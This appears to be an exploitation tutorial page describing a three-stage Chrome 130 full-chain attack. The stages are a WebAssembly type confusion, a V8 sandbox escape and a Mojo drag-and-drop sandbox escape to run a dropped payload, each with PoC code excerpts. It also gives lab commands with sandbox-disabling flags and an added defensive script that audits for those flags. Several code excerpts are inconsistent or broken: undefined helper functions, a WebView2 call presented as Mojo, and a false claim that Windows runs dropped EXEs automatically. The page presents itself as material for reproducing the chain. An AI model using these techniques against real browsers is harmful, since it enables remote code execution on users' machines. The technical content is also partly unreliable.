Chrome Exploiting


This page gives a high-level but practical overview of a “full-chain” exploitation workflow against Google Chrome 130, based on the research series “101 Chrome Exploitation” (Part-0 — Preface). The goal is to give pentesters and exploit developers the minimal background needed to reproduce or adapt the techniques for their own research.

1. Chrome Architecture Overview

Understanding the attack surface requires knowing where code executes and which sandboxes apply.

Chrome process layout & sandboxes

```text
+-------------------------------------------------------------------------+
| Chrome Browser                                                          |
|                                                                         |
|  +----------------------------+      +-----------------------------+    |
|  | Renderer Process           |      | Browser/main Process        |    |
|  | [No direct OS access]      |      | [OS access]                 |    |
|  |  +----------------------+  |      |                             |    |
|  |  | V8 Sandbox           |  |      |                             |    |
|  |  | [JavaScript / Wasm]  |  |      |                             |    |
|  |  +----------------------+  |      |                             |    |
|  +----------------------------+      +-----------------------------+    |
|              | IPC/Mojo                                                 |
|              V                                                          |
|  +----------------------------+                                         |
|  | GPU Process                |                                         |
|  | [Restricted OS access]     |                                         |
|  +----------------------------+                                         |
+-------------------------------------------------------------------------+
```

Layered defense in depth:

  • V8 sandbox (Isolate): memory permissions are restricted to prevent unwanted reads/writes from JITed JS / Wasm.
  • The Renderer ↔ Browser split is enforced through Mojo/IPC message passing; the renderer has no native FS/network access.
  • OS sandboxes further lock down each process (Windows Integrity Levels / seccomp-bpf / macOS sandbox profiles).

A remote attacker therefore needs three primitives in sequence:

  1. Memory corruption inside V8 to obtain arbitrary RW inside the V8 heap.
  2. A second bug that lets the attacker escape the V8 sandbox to full renderer memory.
  3. A final sandbox escape (often a logic bug rather than memory corruption) to execute code outside of the Chrome OS sandbox.

2. Stage 1 – WebAssembly Type-Confusion (CVE-2025-0291)

A bug in TurboFan’s Turboshaft optimisation misinterprets WasmGC reference types when a value is produced and consumed within a single basic-block loop.

Impact:

  • The compiler skips the type-check, treating a reference (externref/anyref) as an int64.
  • Specially crafted Wasm allows a JS object header to overlap attacker-controlled data → addrOf() & fakeObj() AAW / AAR primitives.

Minimal PoC (excerpt):

```wat
(module
  (type $t0 (func (param externref) (result externref)))
  (func $f (param $p externref) (result externref)
    (local $l externref)
    block $exit
      loop $loop
        local.get $p      ;; value with real ref-type
        ;; compiler incorrectly re-uses it as int64 in the same block
        br_if $exit       ;; exit condition keeps us single-block
        br   $loop
      end
    end)
  (export "f" (func $f)))
```

Trigger optimisation & spray objects from JS:

```javascript
const wasmMod = new WebAssembly.Module(bytes);
const wasmInst = new WebAssembly.Instance(wasmMod);
const f = wasmInst.exports.f;

for (let i = 0; i < 1e5; ++i) f({});   // warm-up for JIT

// primitives
let victim   = {m: 13.37};
let fake     = arbitrary_data_backed_typedarray;
let addrVict = addrOf(victim);
```

Outcome: arbitrary read/write within V8.


3. Stage 2 – V8 Sandbox Escape (issue 379140430)

When a Wasm function is tier-up-compiled, a JS ↔ Wasm wrapper is created.

A signature-mismatch bug causes the wrapper to write past the end of a trusted Tuple2 object when the Wasm function is re-optimised while still on the stack.

Overwriting the two 64-bit fields of the Tuple2 object gives read/write on any address inside the Renderer process, effectively bypassing the V8 sandbox.

Key exploit steps:

  1. Arrange for the function to be in the Tier-Up state by switching between turbofan/baseline code.
  2. Trigger the tier-up while keeping a reference on the stack (Function.prototype.apply).
  3. Use the Stage-1 AAR/AAW to locate and corrupt the adjacent Tuple2.

Identifying the wrapper:

```javascript
function wrapperGen(arg) {
  return f(arg);
}
%WasmTierUpFunction(f);          // force tier-up (internals-only flag)
wrapperGen(0x1337n);
```

After the corruption we own a full renderer R/W primitive.


4. Stage 3 – Renderer → OS Sandbox Escape (CVE-2024-11114)

The Mojo IPC interface blink.mojom.DragService.startDragging() can be called from the Renderer with only partially trusted parameters. By crafting a DragData structure that points to an arbitrary file path, the renderer convinces the browser to perform a native drag-and-drop operation outside the renderer sandbox.

Abusing this, we can effectively “drag” a malicious EXE (pre-placed in a world-writable location) onto the Desktop, where Windows automatically runs certain file types once they are dropped.

Example (simplified):

```javascript
const payloadPath = "C:\\Users\\Public\\explorer.exe";

chrome.webview.postMessage({
  type: "DragStart",
  data: {
    title: "MyFile",
    file_path: payloadPath,
    mime_type: "application/x-msdownload"
  }
});
```

No additional memory corruption is required – the logic flaw gives us arbitrary file execution with the user's privileges.


5. Full Chain Flow

  1. The user visits a malicious web page.
  2. Stage 1: a Wasm module exploits CVE-2025-0291 → V8 heap AAR/AAW.
  3. Stage 2: the wrapper mismatch corrupts Tuple2 → escape the V8 sandbox.
  4. Stage 3: startDragging() IPC → escape the OS sandbox & execute the payload.

Result: Remote Code Execution (RCE) on the host (Chrome 130, Windows/Linux/macOS).


6. Lab Setup and Debugging

```shell
# Spin-up local HTTP server w/ PoCs
npm i -g http-server
git clone https://github.com/Petitoto/chromium-exploit-dev
cd chromium-exploit-dev
http-server -p 8000 -c -1

# Windows kernel debugging
"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbgx.exe" -symbolpath srv*C:\symbols*https://msdl.microsoft.com/download/symbols
```

Useful flags when launching a development build of Chrome:

```shell
chrome.exe --no-sandbox --disable-gpu --single-process --js-flags="--allow-natives-syntax"
```
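The lab flags above switch off exactly the layers the chain has to fight through (OS sandbox, renderer/browser split, hidden V8 natives), so their appearance on a production endpoint is worth alerting on. The following audit is an added example, not code from the original write-up or from Chromium: it parses constructed Chrome command lines and reports the defense-weakening switches; the severity wording is this example's own.

```python
import shlex

# Flags from this page's lab setup that weaken Chrome's layered defenses.
# The reason text is this example's own assumption, not a Chrome classification.
SANDBOX_WEAKENING = {
    "--no-sandbox": "disables the OS process sandbox the stage-3 escape has to defeat",
    "--single-process": "merges renderer and browser, removing the Mojo/IPC trust boundary",
}
JS_FLAG_WEAKENING = {
    "--allow-natives-syntax": "exposes V8 internals such as %WasmTierUpFunction to page JavaScript",
}

def parse_flags(cmdline):
    """Map each --switch[=value] on a Chrome command line to its value (None for bare switches)."""
    tokens = shlex.split(cmdline, posix=True)
    flags = {}
    for tok in tokens[1:]:  # skip argv[0]; URLs and other positionals are ignored
        if not tok.startswith("--"):
            continue
        name, sep, value = tok.partition("=")
        flags[name] = value if sep else None
    return flags

def audit_chrome_cmdline(cmdline):
    """Return (flag, reason) findings for every defense-weakening switch found."""
    flags = parse_flags(cmdline)
    findings = [(f, why) for f, why in SANDBOX_WEAKENING.items() if f in flags]
    # --js-flags carries a nested, space-separated V8 command line
    for js_flag in (flags.get("--js-flags") or "").split():
        if js_flag in JS_FLAG_WEAKENING:
            findings.append((f"--js-flags={js_flag}", JS_FLAG_WEAKENING[js_flag]))
    return findings

# Constructed sample command lines, as a process-creation event source might record them
SAMPLES = [
    'chrome.exe --no-sandbox --disable-gpu --single-process --js-flags="--allow-natives-syntax"',
    '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --profile-directory=Default https://example.com',
    '/opt/google/chrome/chrome --js-flags="--max-old-space-size=4096 --allow-natives-syntax"',
]

def audit_all(samples=SAMPLES):
    """Audit every sample; a production endpoint should yield an empty finding list."""
    return {cmd: audit_chrome_cmdline(cmd) for cmd in samples}

if __name__ == "__main__":
    for cmd, findings in audit_all().items():
        print(cmd)
        for flag, why in findings:
            print(f"  [!] {flag}: {why}")
```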

7. Renderer → Kernel Escape Resource

When a renderer exploit needs a kernel pivot that stays within the seccomp profile, abusing AF_UNIX MSG_OOB sockets that remain reachable inside the sandbox offers a predictable path. See the Linux kernel exploitation case-study below for the SKB UAF → kernel RCE chain:

Af Unix Msg Oob Uaf Skb Primitives


Key Takeaways

  • WebAssembly JIT bugs remain a reliable entry point – the type system is still young.
  • Finding a second memory-corruption bug inside V8 (e.g. the wrapper mismatch) greatly simplifies the V8-sandbox escape.
  • Logic vulnerabilities in privileged Mojo IPC interfaces are often enough for the final sandbox escape – pay attention to non-memory bugs.
